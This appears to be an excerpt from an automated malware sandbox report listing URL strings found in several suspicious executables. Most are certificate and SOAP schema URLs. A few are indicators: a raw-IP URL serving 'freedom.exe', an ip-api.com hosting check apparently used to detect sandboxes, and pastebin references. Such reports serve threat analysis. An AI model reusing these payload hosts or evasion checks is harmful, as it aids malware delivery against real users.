Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe-
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exej
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exeryWt.exe
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wfJfUGeGT3.exe, BowExpert.exe.11.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003411000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000336A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Ent
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LRjq$
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LRjq(
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LRjqt
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LRjqp
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LRjq
